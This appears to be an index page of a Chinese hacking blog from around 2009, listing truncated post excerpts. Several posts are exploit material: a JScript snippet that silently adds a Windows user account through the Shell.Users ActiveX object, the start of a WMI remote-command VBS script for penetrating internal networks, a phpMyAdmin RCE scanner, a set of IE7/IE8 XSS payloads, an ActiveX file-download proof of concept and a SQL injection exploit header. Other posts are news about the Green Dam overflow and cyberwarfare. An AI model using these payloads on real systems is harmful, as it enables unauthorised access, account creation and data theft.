Notice:

提示:工欲善其事,必先利其器--09.06.26
预览模式: 普通 | 列表

命令行下一种新的加帐号的方法

今天研究了一下用户控制面板文件nusrmgr.cpl,发现调用的是Shell.Users来加用户,它还同时调用了 wscript.shell、Shell.Application、Shell.LocalMachine这三个组件。不过加用户的话,这一个 Shell.Users就足够了。那么可能在删掉了net.exe和不用adsi之外,这也可能是一种新的加用户的方法。代码如下:

js:
var o=new ActiveXObject( "Shell.Users" );
z=o.create("test") ;
z.changePassword("123456","")

查看更多...

Tags: 命令 帐号 方法

分类:Technology | 固定链接 | 评论: 1 | 引用: 0 | 查看次数: 40

欺骗的艺术 -中文



看完必有帮助.(本人已经看完了,感觉非常良好,所以发出来分享.)

人类天生就有一种探索周围环境的内在动力,作为年轻人,我和凯文?米特尼克(Kevin Mitnick)对这个世界有着无比的好奇心并渴望证明自己的能力。我们努力学习新事物、解决难题并赢得比赛,但同时这个世界又告诉我们一个行为规则――不要过于放任自己对探索自由的强烈渴望。可对于最大胆的科学家和企业家,还有像凯文?米特尼克这样的人来说,跟随内心的这种渴望会带来极大的兴奋,并使他们完成别人认为是无法做到的事情。

查看更多...

Tags: 欺骗的艺术 中文

分类:Technology | 固定链接 | 评论: 1 | 引用: 0 | 查看次数: 78

Rcmd.vbs [Remote Cmd with wmi]

一个vbs脚本,渗透内网用的。

PS:此脚本支持回显!   -Np

On Error Resume Next
Set outstreem=Wscript.stdout
If (LCase(Right(Wscript.fullname,11))="Wscript.exe") Then
Set objShell=Wscript.CreateObject("Wscript.shell")
objShell.Run("cmd.exe /k cscript //nologo "&Chr(34)&Wscript.ScriptFullName&Chr(34))
Wscript.Quit
End If
If Wscript.arguments.Count<4 Then
usage()

查看更多...

Tags: Rcmd.vbs Remote Cmd 渗透 内网 脚本

分类:Technology | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 40

pmaPWN phpMyAdmin Code Injection RCE Scanner

phpMyAdmin 注入利用代码

格式:php

<?php
$list = array(
'/phpmyadmin/',
'/phpMyAdmin/',
'/PMA/',
'/pma/',
'/admin/',
'/dbadmin/',
'/mysql/',
'/myadmin/',
'/phpmyadmin2/',
'/phpMyAdmin2/',
'/phpMyAdmin-2/',
'/php-my-admin/',
'/phpMyAdmin-2.2.3/',
'/phpMyAdmin-2.2.6/',

查看更多...

Tags: pmaPWN phpMyAdmin Code Injection Scanner

分类:Exploits | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 123

Multiple Exploiting IE8/IE7 XSS 漏洞

描述:
Tags[not include <IFRAME>] in ie7/8 are don't allowe to run "javascript:[jscodz]",but
we found them allowed ro run where open it in new target.

代码如下:
<STYLE>@import 'javascript:alert("xss1")';</STYLE>
<IMG SRC=javascript:alert('XSS2')>
<BODY BACKGROUND="javascript:alert('XSS3')">
<LINK REL="stylesheet" HREF="javascript:alert('XSS4');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS5');">
<IFRAME SRC="javascript:alert('XSS6');"></IFRAME>
<DIV STYLE="background-image: url(javascript:alert('XSS7'))">

查看更多...

Tags: Multiple Exploiting IE8/IE7 XSS 漏洞

分类:Exploits | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1324

Edraw PDF Viewer Component任意文件上传漏洞

描述:
BUGTRAQ  ID: 35428

Edraw PDF Viewer Component是轻型的ActiveX空间,允许应用程序显示和操作PDF文件。

PDFVIEWER.PDFViewerCtrl.1 ActiveX控件(pdfviewer.ocx)所提供的FtpDownloadFile()方式没有正确地验证用户所提供的输入参数,如果用户受骗访问了恶意网页,就可能向系统上的任意位置下载文件。

测试方法:
<html>
<body>
<BR><object classid="clsid:44A8091F-8F01-43B7-8CF7-4BBA71E61E04"

查看更多...

Tags: Edraw PDF Viewer Component 上传 漏洞

分类:Exploits | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 736

未来战争网络部队成主导



据美国《华盛顿观察》周刊报道,网络战所发挥的作用已经与核武器等同。特别是美国已经组建的大型军事网络多达20余种,涉及面宽,覆盖范围广,这些网络系统既发挥着巨大的威力,也存在着致命的弱点,一旦这些网络遭到破坏,再强大的火力杀伤武器也难以发挥作用,整个军事系统将处于全面瘫痪的状态。基于这点,各国各军都陆续组建自已的网络战争部队。

查看更多...

Tags: 美国 招安 黑客 网战 部队 攻击 网络

分类:News | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 717

绿坝远程缓冲区溢出漏洞

绿坝”是一个用于监测和反色情的软件,我国政府推广的 。在7月1日,将被迫安装在所有新的中国(公共)电脑上,现在中国已经有5000万份安装。

English:
"Green Dam" is a software used for monitoring and anti-pornography, popularizing by
Chinese goverment. After July 1st, it will be forced to install on all new Chinese PCs.
Now it already has 50 million copies in China.
In order to monitor the URL that user is exploring, Green Dam injected the browser
process. When Green Dam is trying to handle a long URL, a stack overflow will occur in the
browser process.

查看更多...

Tags: 绿坝 远程 缓冲区 溢出 漏洞 Exploit Overflow Green Remote

分类:Exploits | 固定链接 | 评论: 4 | 引用: 0 | 查看次数: 865

研究人员发现绿坝高危漏洞



匿名读者 写道 "密歇根大学研究人员今日发布了一份绿坝的分析报告,报告中指出了一些绿坝的安全隐患,包括一个可以被远程利用的栈溢出漏洞。这三名研究人员分别是密歇根大学计算机系的Scott Wolchok, Randy Yao和J. Alex Halderman。漏洞演示地址:http://wolchok.org:8000/。请注意,安装了绿坝的用户,访问上述网址,浏览器将会崩溃(无其它危害)。当然如果精心设置网页,可以直接控制用户电脑。
如果此漏洞被恶意黑客利用,5000万的绿坝用户将可能全部被黑客控制,沦为肉鸡和傀儡。目前的解决方案是:
1. 关闭绿坝的过滤功能
2. 卸载绿坝(研究也显示软件自身的卸载并不干净)"

查看更多...

Tags: 研究 发现 绿坝 高危 漏洞 lssw365 绿航网

分类:News | 固定链接 | 评论: 2 | 引用: 0 | 查看次数: 669

Sniggabo CMS 远程SQL注入漏洞

<?php
print_r('
 
################################################
 
Sniggabo CMS - Remote SQL Injection Exploit
 
Date:    11.06.2009
Vulnerability discovered by: Lidloses_Auge
Exploit coded by:  Lidloses_Auge
Homepage:       http://www.novusec.com
Greetz to:   -=Player=- , Suicide, enco,
    Palme, GPM, karamble, Free-Hack
 
Admin Panel:  

查看更多...

Tags: Sniggabo CMS article.php id Remote sql Injection Exploit

分类:Exploits | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 283